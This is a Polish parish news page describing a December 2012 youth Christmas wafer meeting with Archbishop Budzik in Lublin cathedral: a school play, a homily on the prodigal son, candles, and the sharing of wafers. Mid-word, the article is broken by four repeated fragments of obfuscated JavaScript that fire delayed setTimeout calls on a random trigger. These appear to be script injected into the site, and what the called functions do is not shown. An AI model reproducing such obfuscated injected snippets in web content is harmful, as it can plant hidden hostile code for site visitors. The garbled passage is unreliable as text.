wstazka
Kościół Świętego Ducha
Strona główna -> Aktualności
Wpisał:adminicdmstracja Data: 16-12-2012
ikona

Relacja ze spotkania opłatkowego „Odnów Przymierze z Bogiem”

15 grudnia w Archikatedrze św. Jana Chrzciciela i św. Jana Ewangelisty miało miejsce spotkanie opłatkowe młodzieży z arcybiskupem Stanisławem Budzikiem. Odbyło się pod hasłem „Odnów przymierze z Bogiem”, na którym motywem przewodnim było Światło. Na spotkaniu pojawiła się młodzież z całej archidiecezji razem ze swoimi kapłanami.

Spotkanie rozpoczęło przedstawienie pt. „Przed sobą”, przygoandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towane przez grupę teatralną z 7. LO w Lublinie. Został w nim poruszony problem wyborów dokonywanych przez młodych ludzi, co wybrać: miłość bez zobowiązań, karierę, pieniądze czy prawdziwą miłość i rodzinę. Inscenizacja była okazją do rozmyślania nad życiem i przyszłością.

Po występie grupy teatralnej zebrani wysłuchali dwóch czytań, psalmu i Ewangelii, po czym arcybiskup skierował słowa do zebranych, w których powiedział, że poprzez przypowieść o synu marnotrawnym możemy zobaczyć potęgę Bożej miłości, która przewyższa ludzkie wyobrażenia. Tylko Bóg może nas sądzić, bo tylko On zna tajemnice ludzkiego serca.

Następnie został wniesiony krzyż Taize, przedstawiciele poszczególnych grup z archidiecezji odpalili świece od paschału. Gdy każdy z uczestników zapalił świeczkę, nastąpiło odnowienie przymierza poprzez wyznanie wiary. Każdy ze zgromadzonych otrzymał błogosławieństwo od obecnych w katedrze kapłanów.

Ostatnią częścią spotkania opłatkowego było poświęcenie opłatków, po czym połamanie się nimi i złożenie życzeń. Zebrani młodzi ludzie mogli połamać się opłatkiem z arcybiskupem Budzikiem. Można było usłyszeć życzenia zdrowia, radości, ale także pełnych miłości Świąt, łaski Bożej oraz prawdziwego narodzenia się w naszych sercach Jezusa.

Spotkanie swoim śpiewem wzbogaciła schola z Jastkowa.

Wydarzenie zostało zorganizowane w ramach trwającego Roku Wiary. Kolejnym spotkaniem będą Obchody ŚDM w diecezji „Odkrywamy/nadajemy smak – Sól” oraz Spotkanie Młodych – Woda w Garbowie.

Relacja audio

      1. słowo Biskupa opłatek

Monika Stasieczek

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video